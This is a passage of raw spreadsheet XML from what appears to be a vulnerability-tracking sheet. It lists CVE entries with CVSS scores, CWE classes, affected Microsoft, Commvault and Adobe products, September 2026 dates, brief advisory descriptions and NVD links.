t="inlineStr"><is><t>HIGH</t></is></c><c r="F756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G756" s="5" t="inlineStr" /><c r="H756" s="5" t="n"><v>0.008</v></c><c r="I756" s="5" t="inlineStr" /><c r="J756" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K756" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L756" s="5" t="inlineStr" /><c r="M756" s="5" t="inlineStr" /><c r="N756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O756" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P756" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q756" s="5" t="inlineStr" /><c r="R756" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S756" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T756" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t></is></c></row><row r="757"><c r="A757" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B757" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C757" s="5" t="inlineStr"><is><t>CVE-2026-69930</t></is></c><c r="D757" s="5" t="n"><v>7.5</v></c><c r="E757" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G757" s="5" t="inlineStr" /><c r="H757" s="5" t="n"><v>0.008</v></c><c r="I757" s="5" t="inlineStr" /><c r="J757" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K757" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L757" s="5" t="inlineStr" /><c r="M757" s="5" t="inlineStr" /><c r="N757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O757" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P757" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q757" s="5" t="inlineStr" /><c r="R757" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S757" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T757" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t></is></c></row><row r="758"><c r="A758" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B758" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C758" s="5" t="inlineStr"><is><t>CVE-2026-70065</t></is></c><c r="D758" s="5" t="n"><v>7.5</v></c><c r="E758" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F758" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G758" s="5" t="inlineStr" /><c r="H758" s="5" t="n"><v>0.012</v></c><c r="I758" s="5" t="inlineStr" /><c r="J758" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K758" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L758" s="5" t="inlineStr" /><c r="M758" s="5" t="inlineStr" /><c r="N758" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O758" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P758" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q758" s="5" t="inlineStr" /><c r="R758" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S758" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T758" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t></is></c></row><row r="759"><c r="A759" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B759" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C759" s="5" t="inlineStr"><is><t>CVE-2026-70124</t></is></c><c r="D759" s="5" t="n"><v>7.5</v></c><c r="E759" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G759" s="5" t="inlineStr" /><c r="H759" s="5" t="n"><v>0.008</v></c><c r="I759" s="5" t="inlineStr" /><c r="J759" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K759" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L759" s="5" t="inlineStr" /><c r="M759" s="5" t="inlineStr" /><c r="N759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O759" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P759" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q759" s="5" t="inlineStr" /><c r="R759" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S759" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T759" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t></is></c></row><row r="760"><c r="A760" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B760" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C760" s="5" t="inlineStr"><is><t>CVE-2026-70570</t></is></c><c r="D760" s="5" t="n"><v>7.5</v></c><c r="E760" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F760" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G760" s="5" t="inlineStr" /><c r="H760" s="5" t="n"><v>0.004</v></c><c r="I760" s="5" t="inlineStr" /><c r="J760" s="5" t="inlineStr" /><c r="K760" s="5" t="inlineStr" /><c r="L760" s="5" t="inlineStr" /><c r="M760" s="5" t="inlineStr" /><c r="N760" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O760" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P760" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q760" s="5" t="inlineStr" /><c r="R760" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S760" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T760" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t></is></c></row><row r="761"><c r="A761" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B761" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C761" s="5" t="inlineStr"><is><t>CVE-2026-70579</t></is></c><c r="D761" s="5" t="n"><v>7.5</v></c><c r="E761" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F761" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G761" s="5" t="inlineStr" /><c r="H761" s="5" t="n"><v>0.01</v></c><c r="I761" s="5" t="inlineStr" /><c r="J761" s="5" t="inlineStr" /><c r="K761" s="5" t="inlineStr" /><c r="L761" s="5" t="inlineStr" /><c r="M761" s="5" t="inlineStr" /><c r="N761" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q761" s="5" t="inlineStr" /><c r="R761" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S761" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T761" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t></is></c></row><row r="762"><c r="A762" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B762" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C762" s="5" t="inlineStr"><is><t>CVE-2026-70587</t></is></c><c r="D762" s="5" t="n"><v>7.5</v></c><c r="E762" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F762" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G762" s="5" t="inlineStr" /><c r="H762" s="5" t="n"><v>0.008</v></c><c r="I762" s="5" t="inlineStr" /><c r="J762" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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62" s="5" t="inlineStr" /><c r="M762" s="5" t="inlineStr" /><c r="N762" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O762" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P762" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q762" s="5" t="inlineStr" /><c r="R762" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S762" s="5" t="inlineStr"><is><t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T762" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t></is></c></row><row r="763"><c r="A763" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B763" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C763" s="5" t="inlineStr"><is><t>CVE-2026-71330</t></is></c><c r="D763" s="5" t="n"><v>7.5</v></c><c r="E763" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F763" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G763" s="5" t="inlineStr" /><c r="H763" s="5" t="n"><v>0.008</v></c><c r="I763" s="5" t="inlineStr" /><c r="J763" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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63" s="5" t="inlineStr" /><c r="M763" s="5" t="inlineStr" /><c r="N763" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O763" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P763" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q763" s="5" t="inlineStr" /><c r="R763" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S763" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T763" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t></is></c></row><row r="764"><c r="A764" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B764" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C764" s="5" t="inlineStr"><is><t>CVE-2026-72923</t></is></c><c r="D764" s="5" t="n"><v>7.5</v></c><c r="E764" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F764" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G764" s="5" t="inlineStr" /><c r="H764" s="5" t="n"><v>0.012</v></c><c r="I764" s="5" t="inlineStr" /><c r="J764" s="5" t="inlineStr" /><c r="K764" s="5" t="inlineStr" /><c r="L764" s="5" t="inlineStr" /><c r="M764" s="5" t="inlineStr" /><c r="N764" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O764" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P764" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q764" s="5" t="inlineStr" /><c r="R764" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S764" s="5" t="inlineStr"><is><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is></c><c r="T764" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t></is></c></row><row r="765"><c r="A765" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B765" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C765" s="5" t="inlineStr"><is><t>CVE-2026-72928</t></is></c><c r="D765" s="5" t="n"><v>7.5</v></c><c r="E765" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F765" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G765" s="5" t="inlineStr" /><c r="H765" s="5" t="n"><v>0.006</v></c><c r="I765" s="5" t="inlineStr" /><c r="J765" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K765" s="5" t="inlineStr"><is><t>microsoft:windows_server_2025</t></is></c><c r="L765" s="5" t="inlineStr" /><c r="M765" s="5" t="inlineStr" /><c r="N765" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O765" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P765" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q765" s="5" t="inlineStr" /><c r="R765" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S765" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T765" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t></is></c></row><row r="766"><c r="A766" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B766" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C766" s="5" t="inlineStr"><is><t>CVE-2026-72932</t></is></c><c r="D766" s="5" t="n"><v>7.5</v></c><c r="E766" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F766" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G766" s="5" t="inlineStr" /><c r="H766" s="5" t="n"><v>0.01</v></c><c r="I766" s="5" t="inlineStr" /><c r="J766" s="5" t="inlineStr" /><c r="K766" s="5" t="inlineStr" /><c r="L766" s="5" t="inlineStr" /><c r="M766" s="5" t="inlineStr" /><c r="N766" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q766" s="5" t="inlineStr" /><c r="R766" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S766" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T766" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t></is></c></row><row r="767"><c r="A767" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B767" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C767" s="5" t="inlineStr"><is><t>CVE-2026-72943</t></is></c><c r="D767" s="5" t="n"><v>7.5</v></c><c r="E767" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F767" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G767" s="5" t="inlineStr" /><c r="H767" s="5" t="n"><v>0.006</v></c><c r="I767" s="5" t="inlineStr" /><c r="J767" s="5" t="inlineStr" /><c r="K767" s="5" t="inlineStr" /><c r="L767" s="5" t="inlineStr" /><c r="M767" s="5" t="inlineStr" /><c r="N767" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O767" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P767" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q767" s="5" t="inlineStr" /><c r="R767" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S767" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T767" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t></is></c></row><row r="768"><c r="A768" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B768" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C768" s="5" t="inlineStr"><is><t>CVE-2026-72949</t></is></c><c r="D768" s="5" t="n"><v>7.5</v></c><c r="E768" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F768" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G768" s="5" t="inlineStr" /><c r="H768" s="5" t="n"><v>0.011</v></c><c r="I768" s="5" t="inlineStr" /><c r="J768" s="5" t="inlineStr" /><c r="K768" s="5" t="inlineStr" /><c r="L768" s="5" t="inlineStr" /><c r="M768" s="5" t="inlineStr" /><c r="N768" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q768" s="5" t="inlineStr" /><c r="R768" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S768" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T768" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t></is></c></row><row r="769"><c r="A769" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B769" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C769" s="5" t="inlineStr"><is><t>CVE-2026-72954</t></is></c><c r="D769" s="5" t="n"><v>7.5</v></c><c r="E769" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F769" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G769" s="5" t="inlineStr" /><c r="H769" s="5" t="n"><v>0.006</v></c><c r="I769" s="5" t="inlineStr" /><c r="J769" s="5" t="inlineStr" /><c r="K769" s="5" t="inlineStr" /><c r="L769" s="5" t="inlineStr" /><c r="M769" s="5" t="inlineStr" /><c r="N769" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O769" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P769" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q769" s="5" t="inlineStr" /><c r="R769" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S769" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T769" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t></is></c></row><row r="770"><c r="A770" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B770" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C770" s="5" t="inlineStr"><is><t>CVE-2026-72989</t></is></c><c r="D770" s="5" t="n"><v>7.5</v></c><c r="E770" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F770" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G770" s="5" t="inlineStr" /><c r="H770" s="5" t="n"><v>0.008</v></c><c r="I770" s="5" t="inlineStr" /><c r="J770" s="5" t="inlineStr" /><c r="K770" s="5" t="inlineStr" /><c r="L770" s="5" t="inlineStr" /><c r="M770" s="5" t="inlineStr" /><c r="N770" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q770" s="5" t="inlineStr" /><c r="R770" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S770" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T770" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t></is></c></row><row r="771"><c r="A771" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B771" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C771" s="5" t="inlineStr"><is><t>CVE-2026-73017</t></is></c><c r="D771" s="5" t="n"><v>7.5</v></c><c r="E771" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F771" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G771" s="5" t="inlineStr" /><c r="H771" s="5" t="n"><v>0.002</v></c><c r="I771" s="5" t="inlineStr" /><c r="J771" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K77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71" s="5" t="inlineStr" /><c r="M771" s="5" t="inlineStr" /><c r="N771" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O771" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P771" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q771" s="5" t="inlineStr" /><c r="R771" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S771" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t></is></c><c r="T771" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t></is></c></row><row r="772"><c r="A772" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B772" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C772" s="5" t="inlineStr"><is><t>CVE-2026-75998</t></is></c><c r="D772" s="5" t="n"><v>7.5</v></c><c r="E772" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F772" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G772" s="5" t="inlineStr" /><c r="H772" s="5" t="n"><v>0.006</v></c><c r="I772" s="5" t="inlineStr" /><c r="J772" s="5" t="inlineStr" /><c r="K772" s="5" t="inlineStr" /><c r="L772" s="5" t="inlineStr" /><c r="M772" s="5" t="inlineStr" /><c r="N772" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O772" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P772" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q772" s="5" t="inlineStr" /><c r="R772" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S772" s="5" t="inlineStr"><is><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is></c><c r="T772" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t></is></c></row><row r="773"><c r="A773" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B773" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C773" s="5" t="inlineStr"><is><t>CVE-2026-77101</t></is></c><c r="D773" s="5" t="n"><v>7.5</v></c><c r="E773" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G773" s="5" t="inlineStr" /><c r="H773" s="5" t="n"><v>0.003</v></c><c r="I773" s="5" t="inlineStr" /><c r="J773" s="5" t="inlineStr" /><c r="K773" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L773" s="5" t="inlineStr" /><c r="M773" s="5" t="inlineStr" /><c r="N773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O773" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P773" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q773" s="5" t="inlineStr" /><c r="R773" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S773" s="5" t="inlineStr"><is><t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T773" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t></is></c></row><row r="774"><c r="A774" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B774" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C774" s="5" t="inlineStr"><is><t>CVE-2026-77102</t></is></c><c r="D774" s="5" t="n"><v>7.5</v></c><c r="E774" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G774" s="5" t="inlineStr" /><c r="H774" s="5" t="n"><v>0.003</v></c><c r="I774" s="5" t="inlineStr" /><c r="J774" s="5" t="inlineStr" /><c r="K774" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L774" s="5" t="inlineStr" /><c r="M774" s="5" t="inlineStr" /><c r="N774" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O774" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P774" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q774" s="5" t="inlineStr" /><c r="R774" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S774" s="5" t="inlineStr"><is><t>CommServe contained a heap-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T774" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77102</t></is></c></row><row r="775"><c r="A775" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B775" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C775" s="5" t="inlineStr"><is><t>CVE-2026-77103</t></is></c><c r="D775" s="5" t="n"><v>7.5</v></c><c r="E775" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G775" s="5" t="inlineStr" /><c r="H775" s="5" t="n"><v>0.003</v></c><c r="I775" s="5" t="inlineStr" /><c r="J775" s="5" t="inlineStr" /><c r="K775" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L775" s="5" t="inlineStr" /><c r="M775" s="5" t="inlineStr" /><c r="N775" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O775" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P775" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q775" s="5" t="inlineStr" /><c r="R775" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S775" s="5" t="inlineStr"><is><t>CommServe contained an authentication bypass issue affecting access authorization and information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T775" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77103</t></is></c></row><row r="776"><c r="A776" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B776" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C776" s="5" t="inlineStr"><is><t>CVE-2026-77104</t></is></c><c r="D776" s="5" t="n"><v>7.5</v></c><c r="E776" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G776" s="5" t="inlineStr" /><c r="H776" s="5" t="n"><v>0.004</v></c><c r="I776" s="5" t="inlineStr" /><c r="J776" s="5" t="inlineStr" /><c r="K776" s="5" t="inlineStr"><is><t>commvault:commvault, linux:linux_kernel, microsoft:windows</t></is></c><c r="L776" s="5" t="inlineStr" /><c r="M776" s="5" t="inlineStr" /><c r="N776" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O776" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P776" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q776" s="5" t="inlineStr" /><c r="R776" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S776" s="5" t="inlineStr"><is><t>CommServe contained a path traversal issue affecting information disclosure. Software customers upgrade to resolved maintenance release. Update CommServe.</t></is></c><c r="T776" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77104</t></is></c></row><row r="777"><c r="A777" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B777" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C777" s="5" t="inlineStr"><is><t>CVE-2026-77108</t></is></c><c r="D777" s="5" t="n"><v>7.5</v></c><c r="E777" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F777" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G777" s="5" t="inlineStr" /><c r="H777" s="5" t="n"><v>0.005</v></c><c r="I777" s="5" t="inlineStr" /><c r="J777" s="5" t="inlineStr" /><c r="K777" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L777" s="5" t="inlineStr" /><c r="M777" s="5" t="inlineStr" /><c r="N777" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O777" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P777" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q777" s="5" t="inlineStr" /><c r="R777" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S777"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T777" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77108</t></is></c></row><row r="778"><c r="A778" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B778" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C778" s="5" t="inlineStr"><is><t>CVE-2026-77494</t></is></c><c r="D778" s="5" t="n"><v>7.5</v></c><c r="E778" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F778" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G778" s="5" t="inlineStr" /><c r="H778" s="5" t="n"><v>0.012</v></c><c r="I778" s="5" t="inlineStr" /><c r="J778" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K778" s="5" 